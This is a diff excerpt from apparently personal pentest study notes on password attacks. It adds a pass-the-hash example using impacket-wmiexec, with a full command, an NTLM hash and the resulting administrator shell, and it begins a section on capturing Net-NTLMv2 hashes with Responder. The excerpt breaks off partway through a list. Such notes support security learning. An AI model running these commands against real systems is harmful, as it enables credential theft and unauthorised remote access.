bmos1/bmos1/password-attacks.md

 NT authority\system
 ```

+## Use RCE tool impacket-wmiexec with pass-the-hash

+Wmiexec uses Distributed Component Object Model ("DCOM") to connect remotely to a system.
+The threat actor’s execution of wmiexec.py will establish their connection with DCOM/RPC on port 135, the response back to the threat actor system is sent via the Server Message Block ("SMB") protocol.

 ```bash
 impacket-wmiexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@10.1.2.3
 ...
 C:\>whoami
 files02\administrator
 ```
 ## Abuse Net-NTLMv2 Auth Protocol

+Scenario

+* No Administration account on Windows to retrieve SAM with mimikatz
 * Abuse the Net-NTLMv2 network authentication protocol
 * Use `Responder` tool to setup a honeypot and print captured hashes
 * Supported protocols are: